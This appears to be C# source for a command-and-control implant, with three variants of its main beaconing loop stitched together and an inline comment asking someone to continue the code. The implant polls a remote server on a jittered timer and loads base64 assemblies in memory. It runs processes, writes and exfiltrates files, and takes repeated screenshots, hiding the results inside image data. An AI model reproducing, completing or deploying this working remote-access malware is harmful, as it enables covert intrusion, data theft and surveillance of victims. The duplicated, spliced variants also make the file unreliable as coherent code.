public static void Exec(string cmd, string taskId, string key = null, byte[] encByte = null)
{
if (string.IsNullOrEmpty(key))
{
key = pKey;
}
var eTaskId = Encryption(key, taskId);
var dcoutput = "";
if (encByte != null)
{
dcoutput = Encryption(key, null, true, encByte);
}
else
{
dcoutput = Encryption(key, cmd, true);
}
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
var attempts = 0;
while (attempts < 5)
{
attempts += 1;
try
{
GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes);
attempts = 5;
} catch {}
}
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
int beacontime = 5;
if (!Int32.TryParse(Sleep, out beacontime))
{
beacontime = 5;
}
var strOutput = new StringWriter();
Console.SetOut(strOutput);
var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
{
if (Convert.ToDateTime(KillDate) < DateTime.Now)
{
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", tasksrc = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
} //CAN YOU CONTINUE FROM THIS POINT?
if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
if (c.ToLower().StartsWith("exit"))
{
exitvt.Set();
break;
}
else if (c.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output.AppendLine("Module loaded sucessfully");
tasksrc = "Module loaded sucessfully";
}
else if (c.ToLower().StartsWith("upload-file"))
{
var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
var fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
else if (c.ToLower().StartsWith("download-file"))
{
var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
var file = File.ReadAllBytes(path.Replace("\"", ""));
var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
var dtask = Encryption(Key, c);
var dcoutput = Encryption(Key, "", true, fileChuck);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
}
else if (c.ToLower().StartsWith("get-screenshotmulti"))
{
bool sShot = true;
int sShotCount = 1;
while (sShot)
{
var sHot = RunAssembly("run-exe Core.Program Core get-screenshot");
var dtask = Encryption(Key, c);
var dcoutput = Encryption(Key, strOutput.ToString(), true);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
Thread.Sleep(240000);
sShotCount++;
if (sShotCount > 100)
{
sShot = false;
tasksrc = "Finished Multi";
var sbc = strOutput.GetStringBuilder();
sbc.Remove(0, sbc.Length);
output.Append("[+] Multi Screenshot Ran Sucessfully");
}
}
}
else if (c.ToLower().StartsWith("listmodules"))
{
var appd = AppDomain.CurrentDomain.GetAssemblies();
output.AppendLine("[+] Modules loaded:").AppendLine("");
foreach (var ass in appd)
{
output.AppendLine(ass.FullName.ToString());
}
}
else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe"))
{
output.AppendLine(RunAssembly(c));
}
else if (c.ToLower().StartsWith("start-process"))
{
var proc = c.Replace("'", "").Replace("\"", "");
var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
var p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = p.StartInfo.RedirectStandardError = p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd());
p.WaitForExit();
}
else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Int32.Parse(mch.Groups["t"].Value);
switch (mch.Groups["u"].Value)
{
case "h":
beacontime *= 3600;
break;
case "m":
beacontime *= 60;
break;
}
}
else
{
output.AppendLine($@"[X] Invalid time ""{c}""");
}
}
output.AppendLine(strOutput.ToString());
var sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
if (tasksrc.Length > 200)
{
tasksrc = tasksrc.Substring(0, 199);
}
var task = Encryption(Key, tasksrc);
var coutput = Encryption(Key, output.ToString(), true);
var outputBytes = System.Convert.FromBase64String(coutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
catch (Exception e)
{
var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter)
{
UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
int beacontime = 5;
var ibcnRgx = new Regex(@"(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var imch = ibcnRgx.Match(Sleep);
if (imch.Success)
{
beacontime = Parse_Beacon_Time(imch.Groups["t"].Value, imch.Groups["u"].Value);
}
var strOutput = new StringWriter();
Console.SetOut(strOutput);
var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
double dJitter = 0;
if (!Double.TryParse(Jitter, NumberStyles.Any, CultureInfo.InvariantCulture, out dJitter))
{
dJitter = 0.2;
}
while (!exitvt.WaitOne((int)(new Random().Next((int)(beacontime * 1000 * (1F - dJitter)), (int)(beacontime * 1000 * (1F + dJitter))))))
{
if (Convert.ToDateTime(KillDate) < DateTime.Now)
{
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
}
if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
var taskId = c.Substring(0, 5);
cmd = c.Substring(5, c.Length - 5);
if (cmd.ToLower().StartsWith("exit"))
{
exitvt.Set();
break;
}
else if (cmd.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
}
else if (cmd.ToLower().StartsWith("upload-file"))
{
var path = Regex.Replace(cmd, "upload-file", "", RegexOptions.IgnoreCase);
var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
var fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
}
else if (cmd.ToLower().StartsWith("download-file"))
{
var path = Regex.Replace(cmd, "download-file ", "", RegexOptions.IgnoreCase);
var file = File.ReadAllBytes(path.Replace("\"", ""));
var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
var eTaskId = Encryption(Key, taskId);
var dcoutput = Encryption(Key, "", true, fileChuck);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes);
continue;
}
else if (cmd.ToLower().StartsWith("get-screenshotmulti"))
{
bool sShot = true;
int sShotCount = 1;
while (sShot)
{
var sHot = rAsm("run-exe Core.Program Core get-screenshot");
var eTaskId = Encryption(Key, taskId);
var dcoutput = Encryption(Key, strOutput.ToString(), true);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes);
Thread.Sleep(240000);
sShotCount++;
if (sShotCount > 100)
{
sShot = false;
var sbc = strOutput.GetStringBuilder();
sbc.Remove(0, sbc.Length);
output.Append("[+] Multi Screenshot Ran Sucessfully");
}
}
continue;
}
else if (cmd.ToLower().StartsWith("get-screenshot"))
{
var sHot = rAsm("run-exe Core.Program Core get-screenshot");
var eTaskId = Encryption(Key, taskId);
var dcoutput = Encryption(Key, strOutput.ToString(), true);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes);
var sbc = strOutput.GetStringBuilder();
sbc.Remove(0, sbc.Length);
continue;
}
else if (cmd.ToLower().StartsWith("listmodules"))
{
var appd = AppDomain.CurrentDomain.GetAssemblies();
output.AppendLine("[+] Modules loaded:").AppendLine("");
foreach (var ass in appd)
{
output.AppendLine(ass.FullName.ToString());
}
}
else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe"))
{
output.AppendLine(rAsm(cmd));
}
else if (cmd.ToLower().StartsWith("setbeacon") || cmd.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
}
else
{
output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
}
}
output.AppendLine(strOutput.ToString());
var sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
var enTaskId = Encryption(Key, taskId);
var coutput = Encryption(Key, output.ToString(), true);
var outputBytes = System.Convert.FromBase64String(coutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(enTaskId).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
catch (Exception e)
{
var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, String.Format("Error: {0} {1}", output.ToString(), e), true);
var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter)
{
UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
pKey = Key;
int beacontime = 5;
var ibcnRgx = new Regex(@"(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var imch = ibcnRgx.Match(Sleep);
if (imch.Success)
{
beacontime = Parse_Beacon_Time(imch.Groups["t"].Value, imch.Groups["u"].Value);
}
var strOutput = new StringWriter();
Console.SetOut(strOutput);
var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
double dJitter = 0;
if (!Double.TryParse(Jitter, NumberStyles.Any, CultureInfo.InvariantCulture, out dJitter))
{
dJitter = 0.2;
}
while (!exitvt.WaitOne((int)(new Random().Next((int)(beacontime * 1000 * (1F - dJitter)), (int)(beacontime * 1000 * (1F + dJitter))))))
{
if (DateTime.ParseExact(KillDate, "yyyy-MM-dd", CultureInfo.InvariantCulture) < DateTime.Now)
{
Run = false;
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
}
if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
Program.taskId = c.Substring(0, 5);
cmd = c.Substring(5, c.Length - 5);
if (cmd.ToLower().StartsWith("exit"))
{
Run = false;
exitvt.Set();
break;
}
else if (cmd.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
Exec(output.ToString(), taskId, Key);
}
else if (cmd.ToLower().StartsWith("run-dll-background") || cmd.ToLower().StartsWith("run-exe-background"))
{
Thread t = new Thread(() => rAsm(cmd));
Exec("[+] Running background task", taskId, Key);
t.Start();
}
else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe"))
{
output.AppendLine(rAsm(cmd));
}
else if (cmd.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
}
else
{
output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
}
Exec("Beacon set", taskId, Key);
}
else
{
var sHot = rAsm($"run-exe Core.Program Core {cmd}");
}
output.AppendLine(strOutput.ToString());
var sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
if (output.Length > 2)
{
Exec(output.ToString(), taskId, Key);
}
output.Length = 0;
}
}
}
catch (NullReferenceException e) {}
catch (WebException e) {}
catch (Exception e)
{
Exec(String.Format("Error: {0} {1}", output.ToString(), e), "Error", Key);
}
finally
{
output.AppendLine(strOutput.ToString());
var sc = strOutput.GetStringBuilder();
sc.Remove(0, sc.Length);
if (output.Length > 2)
{
Exec(output.ToString(), "99999", Key);
}
output.Length = 0;
}
}
}